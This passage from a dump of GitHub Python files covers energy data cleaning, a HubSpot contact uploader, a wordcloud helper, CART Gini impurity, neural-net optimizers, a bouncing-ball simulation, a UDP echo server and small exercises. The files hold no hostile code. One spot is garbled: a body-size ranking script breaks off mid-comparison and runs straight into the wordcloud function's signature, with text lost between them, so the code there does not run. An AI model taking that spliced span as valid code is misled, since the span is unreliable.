sixty_2017_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2018\n sixty_2018_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2019\n sixty_2019_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n\n sixty_2016 = {1:sixty_2016_1,2:sixty_2016_2,3:sixty_2016_3,4:sixty_2016_4\n ,5:sixty_2016_5,6:sixty_2016_6,7:sixty_2016_7,8:sixty_2016_8\n ,9:sixty_2016_9,10:sixty_2016_10,11:sixty_2016_11,12:sixty_2016_12}\n\n sixty_2017 = {1:sixty_2017_1,2:sixty_2017_2,3:sixty_2017_3,4:sixty_2017_4\n ,5:sixty_2017_5,6:sixty_2017_6,7:sixty_2017_7,8:sixty_2017_8\n ,9:sixty_2017_9,10:sixty_2017_10,11:sixty_2017_11,12:sixty_2017_12}\n\n sixty_2018 = {1:sixty_2018_1,2:sixty_2018_2,3:sixty_2018_3,4:sixty_2018_4\n ,5:sixty_2018_5,6:sixty_2018_6,7:sixty_2018_7,8:sixty_2018_8\n ,9:sixty_2018_9,10:sixty_2018_10,11:sixty_2018_11,12:sixty_2018_12}\n\n sixty_2019 = {1:sixty_2019_1,2:sixty_2019_2,3:sixty_2019_3,4:sixty_2019_4\n ,5:sixty_2019_5,6:sixty_2019_6,7:sixty_2019_7,8:sixty_2019_8\n ,9:sixty_2019_9,10:sixty_2019_10,11:sixty_2019_11,12:sixty_2019_12}\n\n sixtys = {16:sixty_2016,17:sixty_2017,18:sixty_2018,19:sixty_2019}\n\n sixtys_clean = clean_agg_sixtys()\n sixtys_clean_f = {}\n for df in 
sixtys_clean.items():\n sixtys_clean_f[df[0]] = df[1].drop(columns=['TECHNOLOGY','PRIMEMOVERCODE', 'OPERATINGMONTH', 'OPERATINGYEAR',\n 'PLANNEDRETIREMENTMONTH', 'PLANNEDRETIREMENTYEAR', 'STATUS',\n 'PLANNEDDERATEYEAR', 'PLANNEDDERATEMONTH',\n 'PLANNEDDERATEOFSUMMERCAPACITY(MW)', 'PLANNEDUPRATEYEAR',\n 'PLANNEDUPRATEMONTH', 'PLANNEDUPRATEOFSUMMERCAPACITY(MW)', 'COUNTY','BALANCINGAUTHORITYCODE',\n 'GOOGLEMAP','BINGMAP', 'UNITCODE','SECTOR','PLANTSTATE','GENERATORID'],errors='ignore').copy()\n sixtys_clean_f[df[0]] = sixtys_clean_f[df[0]].iloc[:-1,:]\n \n sixtys_full = sixtys_clean_f[16]\n i = 0\n for df in sixtys_clean_f.items():\n if i >= 1:\n sixtys_full = pd.concat([sixtys_full,df[1]],axis=0,ignore_index=True)\n i += 1\n\n sixtys_full = sixtys_full.replace(r'^\\s*$', np.nan, regex=True)\n sixtys_full['NETSUMMERCAPACITY(MW)'].fillna(sixtys_full['NAMEPLATECAPACITY(MW)'], inplace=True)\n sixtys_full['NAMEPLATECAPACITY(MW)'].fillna(sixtys_full['NETSUMMERCAPACITY(MW)'], inplace=True)\n sixtys_full['NETWINTERCAPACITY(MW)'].fillna(sixtys_full['NAMEPLATECAPACITY(MW)'], inplace=True)\n sixtys_full = sixtys_full.dropna()\n\n sixtys_full['GEN_TYPE'] = sixtys_full.apply (lambda row: gentype(row), axis=1)\n\n sixtys_full = sixtys_full.infer_objects()\n sixtys_full = sixtys_full.rename(columns={'Month':'MONTH','UTILITYID':'UTILITYNUMBER'})\n sixtys_full = sixtys_full.drop(columns=['ENERGYSOURCECODE'])\n\n sixtys_full.to_csv('../data/860m_clean.csv',index=False)\n\n sixtyones = {16:sixtyone_2016_rev,17:sixtyone_2017_rev,18:sixtyone_2018_rev,\n 19:sixtyone_2019_rev}\n \n clean_sixtyones()\n sixtyones_full = sixtyones[16]\n i = 0\n for df in sixtyones.items():\n if i >= 1:\n sixtyones_full = pd.concat([sixtyones_full,df[1]],axis=0,ignore_index=True)\n i += 1\n\n sixtyones_full['OWNERTYPE'] = sixtyones_full.apply (lambda row: owntype(row), axis=1)\n\n f = sixtyones_full.TOTALREVENUE.where(sixtyones_full.TOTALREVENUE=='.').isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALSALES.where(sixtyones_full.TOTALSALES=='.').isna()\n sixtyones_full = sixtyones_full[f]\n sixtyones_full = sixtyones_full.drop(columns=['OWNERSHIP'])\n sixtyones_full = sixtyones_full.infer_objects()\n f = sixtyones_full.UTILITYNUMBER.where(sixtyones_full.UTILITYNUMBER==0).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.UTILITYNUMBER.where(sixtyones_full.UTILITYNUMBER==88888).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALREVENUE.where(sixtyones_full.TOTALREVENUE==0).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALSALES.where(sixtyones_full.TOTALSALES==0).isna()\n sixtyones_full =sixtyones_full[f]\n sixtyones_group = sixtyones_full.groupby(['DATAYEAR','MONTH','UTILITYNUMBER','UTILITYNAME']).agg({'TOTALREVENUE':'sum','TOTALSALES':'sum','TOTALCUSTOMERS':'sum','OWNERTYPE':'max'})\n sixtyones_group =sixtyones_group.reset_index()\n\n sixtyones_full.to_csv('../data/861m_state_clean.csv',index=False)\n sixtyones_group.to_csv('../data/861m_clean.csv',index=False)\n\n # COMBINING DATASETS\n sixtys_combine = sixtys_full.drop(columns=['LATITUDE','LONGITUDE','PLANTID','PLANTNAME']).copy()\n y = pd.get_dummies(sixtys_combine.GEN_TYPE, prefix='is')\n sixtys_combine = pd.concat([sixtys_combine, y],axis=1)\n sixtys_combine = sixtys_combine.drop(columns=['GEN_TYPE'])\n full_dirty = pd.merge(left=sixtys_combine,right=sixtyones_group,on=['DATAYEAR','MONTH','UTILITYNUMBER'])\n\n full_dirty['MW_COAL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_coal']\n 
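# Editor's note: multiplying NAMEPLATECAPACITY(MW) by each one-hot is_* dummy routes a generator's\n    # capacity into exactly one fuel bucket (e.g. a 50 MW solar unit gets MW_SOLAR=50 and zero elsewhere),\n    # so the groupby(...).agg('sum') below yields each utility's monthly per-fuel capacity mix.\n    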
full_dirty['MW_GEOTHERMAL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_geothermal']\n full_dirty['MW_HYDROELECTRIC'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_hydroelectric']\n full_dirty['MW_NATURAL_GAS'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_natural_gas']\n full_dirty['MW_NUCLEAR'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_nuclear']\n full_dirty['MW_OIL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_oil']\n full_dirty['MW_OTHER'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_other/unreported']\n full_dirty['MW_SOLAR'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_solar']\n full_dirty['MW_WIND'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_wind']\n\n combine = full_dirty.groupby(['DATAYEAR','MONTH','UTILITYNUMBER']).agg({'NETSUMMERCAPACITY(MW)':'sum','NETWINTERCAPACITY(MW)':'sum','NAMEPLATECAPACITY(MW)':'sum'\n ,'is_coal':'mean','is_geothermal':'mean','is_hydroelectric':'mean','is_natural_gas':'mean'\n ,'is_nuclear':'mean','is_oil':'mean','is_other/unreported':'mean','is_solar':'mean','is_wind':'mean'\n ,'MW_COAL':'sum','MW_GEOTHERMAL':'sum','MW_HYDROELECTRIC':'sum','MW_NATURAL_GAS':'sum'\n ,'MW_NUCLEAR':'sum','MW_OIL':'sum','MW_OTHER':'sum','MW_SOLAR':'sum','MW_WIND':'sum'\n ,'TOTALREVENUE':'mean','TOTALSALES':'mean','TOTALCUSTOMERS':'mean'})\n combine = combine.reset_index()\n\n combine.to_csv('../data/combined.csv',index=False)","repo_name":"lukeschroder/energy_revenues","sub_path":"src/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":18739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6295890040","text":"\nN = int(input())\n\n\narr = [list(map(int,input().split())) for _ in range(N)]\n# print(arr)\n# [[55, 185], [58, 183], [88, 186], [60, 175], [46, 155]]\nres = [1]*N\n\n# print(arr)\nfor i in range(N):\n tmp = arr[i]\n for j in range(N):\n if tmp[0] < arr[j][0] and tmp[1] None:\n \"\"\"\n The `display_wordcloud` function takes a string of text and plots\n the wordcloud.\n\n It also accepts an optional list of words to be removed from the wordcloud.\n\n Args:\n text (str): Pass a string of words to the function\n remove_words (str): Remove words from the wordcloud\n fig_width (int): Width of the wordcloud figure\n fig_height (int): Height of the wordcloud figure\n \"\"\"\n\n # Format data to be displayed\n text = re.sub(r\"[^a-zA-Z0-9 _]\", \"\", text).split(\" \")\n text = \" \".join(word for word in text if len(word) > 1)\n remove_words += STOPWORDS\n\n # Build wordcloud object\n x, y = numpy.ogrid[:fig_height, :fig_width]\n wc_mask = ((x/fig_height - 1/2) ** 2 + (y/fig_width - 1/2) ** 2) > 0.49 ** 2\n wc_mask = 255 * wc_mask.astype(int)\n wc_object = WordCloud(\n width=fig_width, height=fig_height,\n background_color=\"white\", colormap=colors.ListedColormap(COLORS),\n mask=wc_mask,\n max_words = 200, max_font_size = 100, stopwords=remove_words,\n ).generate(text)\n\n # Show figure\n pyplot.imshow(wc_object, interpolation=\"spline36\")\n pyplot.axis(\"off\")\n pyplot.show()\n\n print(wc_object.words_)\n","repo_name":"brobert-philips/pybrors","sub_path":"python/pybrors/utils/plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28389449278","text":"\"\"\"\r\nThis function store the collected contacts with their\r\nrespective transformed data in HubSpot.\r\n\"\"\"\r\n\r\nimport 
requests\r\n\r\ndef savingContacts(df, token, delete_none_emails=True):\r\n    if delete_none_emails:\r\n        df = df[df['raw_email'] != 'None']\r\n    df['address'] = df['address'].fillna(\"None\")\r\n    df['country'] = df['country'].fillna(\"None\")\r\n    df['phone'] = df['phone'].fillna(\"None\")\r\n    \r\n    url = 'https://api.hubapi.com/crm/v3/objects/contacts'\r\n    \r\n    # Handle potential rate limiting by batching requests\r\n    batch_size = 10\r\n    batches = [df[i:i+batch_size] for i in range(0, len(df), batch_size)]\r\n\r\n    headers = {\r\n        'authorization': f'Bearer {token}',  # use the token argument; a live key was hardcoded here in the source\r\n        'content-type': 'application/json'\r\n    }\r\n    \r\n    # Counter of successfully uploaded contacts\r\n    success_count = 0\r\n    for batch in batches:\r\n        contacts = []\r\n        for _, row in batch.iterrows():\r\n            # JSON payload for each contact\r\n            contact = {\r\n                \"properties\": {\r\n                    \"email\": row['raw_email'],\r\n                    \"phone\": row['phone'],\r\n                    \"country\": row['country'],\r\n                    \"city\": row['city'],\r\n                    \"original_create_date\": row['technical_test___create_date'],\r\n                    \"original_industry\": row['industry'],\r\n                    \"temporary_id\": row['hs_object_id'],\r\n                    \"address\": row['address']\r\n                }\r\n            }\r\n            contacts.append(contact)\r\n\r\n        # Request body with a list of contacts\r\n        body = {\"inputs\": contacts}\r\n\r\n        try:\r\n            # POST request to upload the contacts to the HubSpot API\r\n            response = requests.post(url, headers=headers, json=body)\r\n            # Check for request errors\r\n            response.raise_for_status()\r\n            success_count += len(contacts)\r\n        except requests.exceptions.RequestException as e:\r\n            print(f\"Error: {e}\")\r\n    \r\n    message = f\"{success_count} contacts imported to HubSpot successfully\"\r\n\r\n    return message","repo_name":"macasallasb/OnTheFuze-Test-II","sub_path":"Library/SavingContacts.py","file_name":"SavingContacts.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22836046428","text":"rivers = {\n    'nile': 'egypt',\n    'sena': 'france',\n    'tajo': 'spain',\n}\n\nfor river in rivers.keys():\n    print(f\"The {river.title()} runs through {rivers[river].title()}.\")\n\nprint(\"Rivers mentioned:\")\nfor river in rivers.keys():\n    print(f\"\\t{river.title()}\")\n\nprint(\"Countries mentioned:\")\nfor country in rivers.values():\n    print(f\"\\t{country.title()}\")","repo_name":"ImAlexisSaez/book-pcc3","sub_path":"ch06/exer0605_rivers.py","file_name":"exer0605_rivers.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30718878858","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n    CART with the Gini index\n    References: https://www.jianshu.com/p/01d820be67fb\n        http://www.cnblogs.com/pinard/p/6053344.html (theory)\n    CART regression trees and CART classification trees differ mainly on two points:\n    1) continuous values are handled differently\n    2) once the tree is built, predictions are made differently.\n\"\"\"\n\nimport numpy as np\n\ndef Impurity(X,Label,ClassNum = 3):\n    Len = np.size(X)\n    sX = np.sort(X)\n    Tha = np.zeros(Len-1)\n    gi = np.zeros(Len-1)\n    for i in range(Len-1):\n        Th = (sX[i] + sX[i+1])/2\n        Tha[i] = Th\n        idx1 = np.where(X < Th)\n        idx2 = np.where(X >= Th)\n        p = np.zeros([2,ClassNum])\n        g = np.zeros([1,2])\n        ww = np.zeros([2,1])\n        for Ti in range(2):\n            if Ti == 1:\n                idxTP = idx1\n            else:\n                idxTP = idx2\n            Lab = Label[idxTP]\n            for cs in np.arange(1,ClassNum+1):\n                if np.size(idxTP) == 0:\n                    p[Ti,cs-1] = 0\n                else:\n                    p[Ti,cs-1] = np.size(np.where(Lab == cs)) / np.size(idxTP)\n            g[0,Ti] = gini(p[Ti,:])\n            ww[Ti,0] = np.size(idxTP) / Len\n        gi[i] = np.dot(g,ww)\n        del idxTP,Lab\n    
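# Editor's note: gi[i] holds the impurity of splitting at threshold Tha[i]: each child's\n    # Gini value g = 1 - sum_k p_k**2, weighted by that child's share of the samples (ww);\n    # np.argmin below therefore selects the candidate split with the lowest weighted Gini.\n    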
idxa = np.argmin(gi)\n ThA = Tha[idxa]\n impur = gi[idxa]\n return impur,ThA\n\ndef gini(p):\n# 基尼系数计算公式\n if np.all(p == 0):\n g = 0\n else:\n g = 1 - np.sum(np.square(p))\n return g\n\nX = np.array([0,1,5,4,3,4,5,6,8,7,9,0])\nLabel = np.array([1,1,1,1,2,2,2,2,3,3,3,3])\nimpur,ThA = Impurity(X,Label)\nprint(\"impurity=\",impur,\"Best dividing point:\",ThA)\n","repo_name":"rulinqi/ml_action_book_py3","sub_path":"CART_09/classifyTrees.py","file_name":"classifyTrees.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39552354786","text":"# written by Rei Hosseini 07/08/2019\n# Updating the location of a bouncing ball using molecular dynamic concepts and comparing it with the results from LAMMPS\n\nimport numpy as np\nimport math \nimport matplotlib.pyplot as plt\nimport json\n\n\n# particle properties\nm=0.0654498 #based on the diameter and a density of 1000 kg/m^3\ndiam=0.05\nr=diam/2\n\n# contact properties and initial conditions\nKn=10000.\nCn=5.772 # calculated by assuming a COR of 0.7 (O'Sullivan 2011)\nxwall=0.\n\nH0=0.2\ng=9.81\n\ndt=0.000001\n\n# Initializing t,x and v arrays\nt=np.arange(0,1,dt)\nx=np.zeros(np.size(t))\nx[0]=H0\nv=np.zeros(np.size(t))\n\n# Updating Particle Location\nfor i in range(0,np.size(t)-1): \n dn=x[i]-xwall-r\n if dn>=0:\n a=-g\n else:\n a=max((-Kn*(x[i]-r)-Cn*v[i]),0)/m-g\n \n v[i+1]=v[i]+a*dt\n #x[i+1]=(v[i]+v[i+1])/2*dt+x[i]\n x[i+1]=x[i]+v[i]*dt+0.5*a*dt*dt\nnp.savetxt(\"bounce.csv\",x,delimiter=\",\")\n\n\n# Loading JSON results of LAMMPS\nwith open(\"lammps.json\",\"r\") as f:\n data=json.load(f)\n\n# Plotting\nplt.plot(t,x,label=\"My Code\")\nplt.plot(np.arange(len(data[\"height\"]))*data[\"dt\"],data[\"height\"],\"--r\",label=\"LAMMPS\")\nplt.legend()\nplt.show()\n\n","repo_name":"reihos/ls-dem","sub_path":"bouncing_ball/sphere/bounce.py","file_name":"bounce.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18597523723","text":"import numpy as np\nimport gnn\nimport functions as F\n\n\n\nclass Optimizer:\n model = None\n _loss = np.array([]) \n _TPTN = np.array([]) \n\n def __getattr__(self, key):\n if key == 'accuracy' and self._TPTN.size != 0:\n return np.average(self._TPTN)\n elif key == 'loss' and self._loss.size != 0:\n return np.average(self._loss)\n else:\n return None\n\n def setup(self, model):\n self.model = model\n self.reset()\n return self\n\n def update(self, T, batch, lossfun=None):\n raise NotImplementedError\n\n def report(self, loss, TPTN):\n self._loss = np.hstack((self._loss, np.array(loss)))\n self._TPTN = np.hstack((self._TPTN, np.array(TPTN)))\n\n def clear(self):\n self._loss = np.array([])\n self._TPTN = np.array([])\n\n def reset(self):\n pass\n\n\n\nclass GradientMethod(Optimizer):\n\n def __init__(self, alpha=0.01):\n self.alpha = alpha \n\n def update(self, T, batch, lossfun=None):\n inputs = batch[0]\n loss = lossfun(self.model, T, inputs)\n\n grad = loss.backward()\n params = self.model.params\n n_params = tuple([p - self.alpha*d \n for p, d in zip(params, grad)])\n self.model.param_update(n_params)\n\n self.report(loss.data, loss.TPTN)\n\n\nclass SGD(Optimizer):\n\n def __init__(self, alpha=0.01):\n self.alpha = alpha\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = [] \n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in 
zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*g\n for p, g in zip(params, grad)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n\n\n\nclass MomentumSGD(Optimizer):\n\n def __init__(self, alpha=0.01, eta=0.9):\n self.alpha = alpha\n self.eta = eta\n self._w = tuple([0]*3)\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = []\n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*g + self.eta*w\n for p, g, w in zip(params, grad, self._w)])\n self._w = tuple([-self.alpha*g + self.eta*w\n for g, w in zip(grad, self._w)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n \n\n\nclass Adam(Optimizer):\n\n def __init__(self, alpha=0.01, beta1=0.9, beta2=0.999, eps=10**-9):\n self.alpha = alpha\n self.beta1 = beta1\n self.beta2 = beta2\n self.eps = eps\n self._m = tuple([0]*3)\n self._v = tuple([0]*3)\n self._t = 0\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = []\n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n \n self._t += 1\n self._m = tuple([self.beta1*m + (1-self.beta1)*g\n for m, g in zip(self._m, grad)])\n self._v = tuple([self.beta2*v + (1-self.beta2)*(g**2)\n for v, g in zip(self._v, grad)])\n m_hat = tuple([m/(1-self.beta1**self._t) for m in self._m])\n v_hat = tuple([v/(1-self.beta2**self._t) for v in self._v])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*m/(np.sqrt(v)+self.eps)\n for p, m, v in zip(params, m_hat, v_hat)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n\n","repo_name":"IsseiNAKASONE/PFNinternship2019CodingTask","sub_path":"optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36612935166","text":"# External Dependancies\nfrom curtsies import Input\nimport sys\nimport select\nfrom time import sleep\n\n# Custom Dependencies\nfrom Accelerometer import Accelerometer\nfrom Scanner import Scanner\nfrom FileManager import FileManager\n\nPRIMARY_CONNECTION_STRING = \"\"\n\ndef event_loop(accelerometer, file_manager, scanner):\n\n while(True):\n acceleration = accelerometer.compute_acceleration()\n angular_velocity = accelerometer.compute_angular_velocity()\n print(\"Gx=%.2f\" %angular_velocity[0], u'\\u00b0'+ \"/s\", \"\\tGy=%.2f\" %angular_velocity[1], u'\\u00b0'+ \"/s\", \"\\tGz=%.2f\" %angular_velocity[2], u'\\u00b0'+ \"/s\", \"\\tAx=%.2f g\" %acceleration[0], \"\\tAy=%.2f g\" %acceleration[1], \"\\tAz=%.2f g\" %acceleration[2]) \n path = \"\"\n\n input = select.select([sys.stdin], [], [], 1)[0]\n if input:\n value = sys.stdin.readline().rstrip()\n print(value)\n\n if (value == \"s\"):\n print(\"scanning\")\n if scanner.is_in_session == False:\n print(\"New session\")\n path = file_manager.create_folder()\n scanner.start_session(path)\n scanner.scan()\n \n elif (value == \"q\"):\n print(\"Ending session\")\n scan = scanner.stop_session()\n 
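# Editor's note (assumption): stop_session() presumably returns the finished scan record,\n                # which is persisted to the local database next; the Azure upload call below is\n                # left commented out in the source, with PRIMARY_CONNECTION_STRING empty.\n                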
file_manager.insert_session(scan)\n                # file_manager.upload_to_azure_storage(PRIMARY_CONNECTION_STRING, path)\n\n            elif (value == \"d\"):\n                file_manager.show_database()\n\n\ndef main():\n    accelerometer = Accelerometer()\n    accelerometer.MPU_Init()\n    # sleep(1)\n\n    default_root_dir = \"/home/crsz/Pictures/Scans/\"\n    file_manager = FileManager(default_root_dir)\n    scanner = Scanner()\n\n    event_loop(accelerometer, file_manager, scanner)\n\n    file_manager.show_database()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"crsz20/Handheld-3D-Scanner","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36377780878","text":"\nN, M = map(int, input().split())\n\ndp = [1]*101\n\nmax_n = max(N, M)\nfor i in range(1, max_n+1):\n    dp[i] = i * dp[i-1]\n\nprint(dp[N]//(dp[N-M]*dp[M]))\n","repo_name":"studying-ice-bear/pparkkkimeom","sub_path":"GimYujin/Dynamic_Programming_1/bj2407.py","file_name":"bj2407.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41603358735","text":"#!/usr/bin/python2.7\r\n\r\n# imports\r\nimport socket\r\n\r\n# Define the server\r\nlocalAddrPort = (\"127.0.0.1\",20001) # local address and port\r\nbufferSize = 1024 # datagram size\r\n# msgServer = \"Hola Mundo al Cliente\" # message to send to the client\r\n# encodedMsg = str.encode(msgServer) # encoded message\r\n\r\nUDPServerSocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # create the server socket\r\nUDPServerSocket.bind(localAddrPort) # bind to the local address and port\r\nprint(\"Servidor UDP escuchando...\")\r\n\r\nwhile(True): # loop listening for datagrams\r\n    rcvdMsg, clientAddr = UDPServerSocket.recvfrom(bufferSize) # receive a message plus the client's address\r\n    rcvdMsg.decode()\r\n    clientIP = clientAddr[0] # save the client's IP address\r\n    print(\"Mensaje del cliente: \" + rcvdMsg)\r\n    print(\"Direccion del cliente: \" + clientIP)\r\n    # Reply to the client\r\n    encodedMsg = str.encode(str.upper(rcvdMsg)) # convert to uppercase and encode\r\n    UDPServerSocket.sendto(encodedMsg, clientAddr) # send the response to the client","repo_name":"gabgut/investigacion_2","sub_path":"UDP/udpserver.py","file_name":"udpserver.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29713531711","text":"import math\n\ndef exp(x,y):\n    # exponentiation by squaring; the original two-loop version broke the\n    # invariant base == x**i once the squaring loop ran more than twice\n    if y == 0: return 1\n    if y == 1: return x\n    base = x\n    result = 1\n    while y > 0:\n        if y % 2 == 1:\n            result = result*base\n        base = base*base\n        y = y//2\n    return result\n\nprint(exp(9,7))","repo_name":"gabemgem/Algo-S2018","sub_path":"Tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20225288446","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12938\n\ndef solution(n, s):\n    \"\"\"\n    Build n natural numbers that sum to s.\n    The product is maximized when the numbers are as close in size as possible.\n    \"\"\"\n    if n > s:\n        return [-1]\n\n    n1, n2 = divmod(s, n)\n    result = [n1] * n\n    for i in range(n2):\n        result[i] += 1\n\n    return sorted(result)\n\nif __name__ == \"__main__\":\n    # n = 2\n    # s = 9\n    n = 2\n    s = 8\n    result = solution(n, s)\n    print(result)","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/1주차/한나연/최고의 집합.py","file_name":"최고의 
집합.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7792062654","text":"import os\nimport sys\nimport math\nimport platform\nimport traceback\nfrom getch import getch\n\nVERSION = 2\n\nmath_functions = {\n \"COS\": math.cos,\n \"SIN\": math.sin,\n \"TAN\": math.tan,\n \"ACOS\": math.acos,\n \"ASIN\": math.asin,\n \"ATAN\": math.atan,\n \"COSH\": math.cosh,\n \"SINH\": math.sinh,\n \"TANH\": math.tanh,\n \"ACOSH\": math.acosh,\n \"ASINH\": math.asinh,\n \"ATANH\": math.atanh,\n \"DEG\": math.degrees,\n \"RAD\": math.radians,\n \"ABS\": math.fabs,\n \"SQRT\": math.sqrt,\n \"LOG\": math.log,\n \"LOG2\": math.log2,\n \"LOG10\": math.log10,\n \"EXP\": math.exp,\n \"ROUND\": lambda x: float(round(x)),\n \"CEIL\": lambda x: float(math.ceil(x)),\n \"FLOOR\": lambda x: float(math.floor(x))\n}\n\nreserved = [\n \"LET\", \"PRINT\", \"INPUT\", \"IF\", \"GOTO\",\n \"SLEEP\", \"END\", \"LIST\", \"REM\", \"READ\",\n \"WRITE\", \"APPEND\", \"RUN\", \"CLS\", \"CLEAR\",\n \"EXIT\", \"LOAD\", \"SAVE\", \"THEN\", \"ELSE\",\n \"FOR\", \"TO\", \"DO\", \"GOSUB\", \"RETURN\",\n \"STA\", \"STS\", \"STT\", \"LDA\", \"LDS\", \"LDT\", \"DIR\"\n]\n\nregisters = {\n \"A\": 